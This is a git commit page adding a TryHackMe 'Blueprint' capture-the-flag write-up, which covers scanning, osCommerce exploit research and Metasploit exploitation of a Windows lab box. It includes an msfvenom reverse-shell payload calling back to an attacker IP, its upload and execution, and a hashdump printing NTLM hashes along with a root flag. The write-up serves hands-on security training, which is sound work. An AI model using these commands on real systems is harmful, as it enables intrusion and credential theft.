mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Add files via upload
This commit is contained in:
parent
fcb1b71267
commit
b3244653f3
1 changed files with 211 additions and 0 deletions
211
TryHackMe/Blueprint.md
Normal file
211
TryHackMe/Blueprint.md
Normal file
|
@ -0,0 +1,211 @@
|
|||
# TryHackMe-Blueprint
|
||||
|
||||
>Abdullah Rizwan | 23th September , 11:03 PM
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
nmap -sC -sV $IP
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
Nmap scan report for 10.10.37.223
|
||||
Host is up (0.38s latency).
|
||||
Not shown: 987 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||
|_http-server-header: Microsoft-IIS/7.5
|
||||
135/tcp open msrpc Microsoft Windows RPC
|
||||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||||
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|
||||
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|
||||
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|
||||
3306/tcp open mysql MariaDB (unauthorized)
|
||||
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|
||||
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|
||||
49152/tcp open msrpc Microsoft Windows RPC
|
||||
49153/tcp open msrpc Microsoft Windows RPC
|
||||
49154/tcp open msrpc Microsoft Windows RPC
|
||||
49158/tcp open msrpc Microsoft Windows RPC
|
||||
49159/tcp open msrpc Microsoft Windows RPC
|
||||
49160/tcp open msrpc Microsoft Windows RPC
|
||||
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 111.42 seconds
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## Gobuster
|
||||
|
||||
|
||||
```
|
||||
Gobuster v3.0.1
|
||||
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||||
===============================================================
|
||||
[+] Url: http://10.10.37.223:8080
|
||||
[+] Threads: 10
|
||||
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
|
||||
[+] Status codes: 200,204,301,302,307,401,403
|
||||
[+] User Agent: gobuster/3.0.1
|
||||
[+] Timeout: 10s
|
||||
===============================================================
|
||||
2020/09/23 14:30:08 Starting gobuster
|
||||
===============================================================
|
||||
/.htaccess (Status: 403)
|
||||
/.hta (Status: 403)
|
||||
/.htpasswd (Status: 403)
|
||||
/aux (Status: 403)
|
||||
/cgi-bin/ (Status: 403)
|
||||
/com2 (Status: 403)
|
||||
/com3 (Status: 403)
|
||||
/com1 (Status: 403)
|
||||
/con (Status: 403)
|
||||
/licenses (Status: 403)
|
||||
/lpt1 (Status: 403)
|
||||
/lpt2 (Status: 403)
|
||||
/nul (Status: 403)
|
||||
/phpmyadmin (Status: 403)
|
||||
/prn (Status: 403)
|
||||
/server-status (Status: 200)
|
||||
/server-info (Status: 200)
|
||||
/webalizer (Status: 403)
|
||||
===============================================================
|
||||
2020/09/23 14:32:46 Finished
|
||||
|
||||
```
|
||||
|
||||
|
||||
## PORT 8080
|
||||
|
||||
|
||||
https://imgur.com/BFgp2dj.png
|
||||
|
||||
|
||||
|
||||
I looked up on exploitdb for `osCommerce 2.4.3` and found many exploits one of which was
|
||||
|
||||
|
||||
https://imgur.com/vMcOi7I.png
|
||||
|
||||
|
||||
|
||||
https://imgur.com/nUiVxuX.png
|
||||
|
||||
|
||||
For me this exploit failed since I cannot make a new installation of database and RCE depends upon this step to be finished.
|
||||
|
||||
|
||||
## Metasploit
|
||||
|
||||
I looked on msfconsole if there was an exploit available
|
||||
|
||||
https://imgur.com/xnu5rzj.png
|
||||
|
||||
https://imgur.com/FAjAfSx.png
|
||||
|
||||
https://imgur.com/jKf21kZ.png
|
||||
|
||||
Then navigate to `C:\Users\Administrator\Desktop`
|
||||
|
||||
root flag : `THM{aea1e3ce6fe7f89e10cea833ae009bee}`
|
||||
|
||||
|
||||
Now we cannot load `kiwi` because it is not stabilized so we are going to create a payload
|
||||
|
||||
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.94.60 LPORT=7777 -f exe > shell.exe`
|
||||
|
||||
|
||||
Upload the payload on the machine
|
||||
```
|
||||
meterpreter > upload shell.exe
|
||||
[*] uploading : shell.exe -> shell.exe
|
||||
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): shell.exe -> shell.exe
|
||||
[*] uploaded : shell.exe -> shell.exe
|
||||
meterpreter > ls
|
||||
Listing: C:\Users\Administrator\Desktop
|
||||
=======================================
|
||||
|
||||
Mode Size Type Last modified Name
|
||||
---- ---- ---- ------------- ----
|
||||
100666/rw-rw-rw- 282 fil 2019-04-11 18:36:47 -0400 desktop.ini
|
||||
100666/rw-rw-rw- 37 fil 2019-11-27 13:15:37 -0500 root.txt.txt
|
||||
100777/rwxrwxrwx 73802 fil 2020-09-23 15:02:08 -0400 shell.exe
|
||||
|
||||
meterpreter >
|
||||
|
||||
|
||||
```
|
||||
|
||||
Start another msfconsole
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/handler
|
||||
[*] Using configured payload generic/shell_reverse_tcp
|
||||
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > show options
|
||||
|
||||
Module options (exploit/multi/handler):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Wildcard Target
|
||||
|
||||
|
||||
msf5 exploit(multi/handler) > set LHOST 10.8.94.60
|
||||
LHOST => 10.8.94.60
|
||||
msf5 exploit(multi/handler) > set LPORT 7777
|
||||
LPORT => 7777
|
||||
msf5 exploit(multi/handler) >
|
||||
|
||||
```
|
||||
|
||||
### Meterpreter on unstabilized Shell
|
||||
|
||||
```
|
||||
meterpreter > execute -f shell.exe
|
||||
Process 5212 created.
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
|
||||
### Meterperter for getting stablized shell
|
||||
|
||||
|
||||
```
|
||||
msf5 exploit(multi/handler) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.8.94.60:7777
|
||||
[*] Sending stage (176195 bytes) to 10.10.143.248
|
||||
[*] Meterpreter session 1 opened (10.8.94.60:7777 -> 10.10.143.248:49167) at 2020-09-23 15:13:54 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > hashdump
|
||||
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
|
||||
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
|
||||
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
Visit Crackstation
|
Loading…
Reference in a new issue